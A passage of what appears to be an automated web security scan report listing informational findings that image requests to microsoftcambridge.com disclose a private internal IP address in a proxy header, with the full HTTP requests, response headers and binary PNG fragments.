....tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.159. http://microsoftcambridge.com/img/people/community.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /img/people/community.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /img/people/community.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/People/tabid/56/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 12 Feb 2009 05:13:45 GMT
Content-Length: 3360
Date: Sat, 26 Mar 2011 01:42:22 GMT
X-Varnish: 1939095176
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...T............[....tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.160. http://microsoftcambridge.com/img/people/community_ovr.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /img/people/community_ovr.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /img/people/community_ovr.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/People/tabid/56/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 12 Feb 2009 05:13:46 GMT
Content-Length: 3361
Date: Sat, 26 Mar 2011 01:42:28 GMT
X-Varnish: 1939096950
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...T............[....tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.161. http://microsoftcambridge.com/img/people/contact_us.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /img/people/contact_us.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /img/people/contact_us.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/People/tabid/56/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 12 Feb 2009 19:02:08 GMT
Content-Length: 3592
Date: Sat, 26 Mar 2011 01:42:27 GMT
X-Varnish: 1939096609
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...n........H;[.....tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.162. http://microsoftcambridge.com/img/people/events.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /img/people/events.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /img/people/events.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/People/tabid/56/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 12 Feb 2009 05:13:49 GMT
Content-Length: 3249
Date: Sat, 26 Mar 2011 01:42:21 GMT
X-Varnish: 1939094865
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...5.................tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.163. http://microsoftcambridge.com/img/people/events_ovr.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /img/people/events_ovr.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /img/people/events_ovr.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/People/tabid/56/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 12 Feb 2009 05:13:50 GMT
Content-Length: 3248
Date: Sat, 26 Mar 2011 01:42:28 GMT
X-Varnish: 1939096948
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...5.................tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.164. http://microsoftcambridge.com/img/people/featured_team.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /img/people/featured_team.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /img/people/featured_team.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/People/tabid/56/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 12 Feb 2009 05:13:53 GMT
Content-Length: 769
Date: Sat, 26 Mar 2011 01:42:26 GMT
X-Varnish: 1939096234
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR..............=@....tEXtSoftware.Adobe ImageReadyq.e<....IDATx..Y.m.@.&.........T".}LF.#...c.....
.PV.....T...!.Hk    .........    ..x.......EO.....0..1).>........n'.*x.g..............}3x.
...[SNIP]...
24.165. http://microsoftcambridge.com/img/people/header_back.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /img/people/header_back.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /img/people/header_back.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/People/tabid/56/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 12 Feb 2009 05:13:54 GMT
Content-Length: 2839
Date: Sat, 26 Mar 2011 01:42:22 GMT
X-Varnish: 1939095177
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR.............r.$....tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.166. http://microsoftcambridge.com/img/people/latest_feeds.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /img/people/latest_feeds.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /img/people/latest_feeds.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/People/tabid/56/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 12 Feb 2009 05:13:55 GMT
Content-Length: 718
Date: Sat, 26 Mar 2011 01:42:27 GMT
X-Varnish: 1939096601
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR............W......tEXtSoftware.Adobe ImageReadyq.e<...pIDATx..X.m.@.%..X........g?.......g?........
....-9.....
..E.r....}."..._.p..~.}...N?....z...a8.S..7.?.P:.V....g...`n....y..{.
...[SNIP]...
24.167. http://microsoftcambridge.com/img/people/latest_tweet.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /img/people/latest_tweet.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /img/people/latest_tweet.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/People/tabid/56/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Mon, 20 Jul 2009 20:53:19 GMT
Content-Length: 3519
Date: Sat, 26 Mar 2011 01:42:28 GMT
X-Varnish: 1939096953
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR.......".....>.......tEXtSoftware.Adobe ImageReadyq.e<..aIDATx..\[.$.Y.N]../.=.....Y..E^d.I..$&k....g,..C ......../..MD..    ..q@~...E....    8<X..u.Yg...u.s...K./..WO........<.'...S...s...
...[SNIP]...
24.168. http://microsoftcambridge.com/img/people/people.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /img/people/people.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /img/people/people.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/People/tabid/56/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 12 Feb 2009 05:13:58 GMT
Content-Length: 3226
Date: Sat, 26 Mar 2011 01:42:21 GMT
X-Varnish: 1939094859
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...5... .......0X....tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.169. http://microsoftcambridge.com/img/people/search.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /img/people/search.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /img/people/search.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/People/tabid/56/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 12 Feb 2009 05:14:01 GMT
Content-Length: 641
Date: Sat, 26 Mar 2011 01:42:27 GMT
X-Varnish: 1939096608
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...N.........fX.....tEXtSoftware.Adobe ImageReadyq.e<...#IDATx..W...0.M.AV.F.#..'q#.#..e...>..0.1.Y.#...H.;...Y.......K...O#.D..e<Z..
....]....y;..[.s....V...w.....k|...?.......,....
...[SNIP]...
24.170. http://microsoftcambridge.com/img/people/share.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /img/people/share.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /img/people/share.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/People/tabid/56/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 12 Feb 2009 05:14:02 GMT
Content-Length: 581
Date: Sat, 26 Mar 2011 01:42:27 GMT
X-Varnish: 1939096610
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...D.........D......tEXtSoftware.Adobe ImageReadyq.e<....IDATx..W.q.0.u.....@G0........a..g......0B.!qr.=.*.... ....'...?. #..L.....i.trj.v..c.t v..............o...DS.>E....J.H....
...[SNIP]...
24.171. http://microsoftcambridge.com/img/people/subscribe.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /img/people/subscribe.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /img/people/subscribe.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/People/tabid/56/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Fri, 26 Jun 2009 19:03:00 GMT
Content-Length: 3485
Date: Sat, 26 Mar 2011 01:42:27 GMT
X-Varnish: 1939096604
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...h........E%+H....tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.172. http://microsoftcambridge.com/img/people/teams.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /img/people/teams.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /img/people/teams.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/People/tabid/56/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 12 Feb 2009 05:14:03 GMT
Content-Length: 3209
Date: Sat, 26 Mar 2011 01:42:21 GMT
X-Varnish: 1939094796
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR................
....tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.173. http://microsoftcambridge.com/img/people/teams_ovr.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /img/people/teams_ovr.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /img/people/teams_ovr.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/People/tabid/56/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 12 Feb 2009 05:14:04 GMT
Content-Length: 3209
Date: Sat, 26 Mar 2011 01:42:28 GMT
X-Varnish: 1939096929
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR................
....tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.174. http://microsoftcambridge.com/img/people/working.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /img/people/working.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /img/people/working.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/People/tabid/56/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 12 Feb 2009 05:14:06 GMT
Content-Length: 3527
Date: Sat, 26 Mar 2011 01:42:21 GMT
X-Varnish: 1939094860
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...l...........X.....tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.175. http://microsoftcambridge.com/img/people/working_ovr.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /img/people/working_ovr.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /img/people/working_ovr.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/People/tabid/56/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 12 Feb 2009 05:14:07 GMT
Content-Length: 3528
Date: Sat, 26 Mar 2011 01:42:28 GMT
X-Varnish: 1939096956
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...l...........X.....tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.176. http://microsoftcambridge.com/img/teams/about.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /img/teams/about.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /img/teams/about.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Teams/tabid/55/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 12 Feb 2009 05:14:18 GMT
Content-Length: 3157
Date: Sat, 26 Mar 2011 01:42:12 GMT
X-Varnish: 1939092467
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR................
....tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
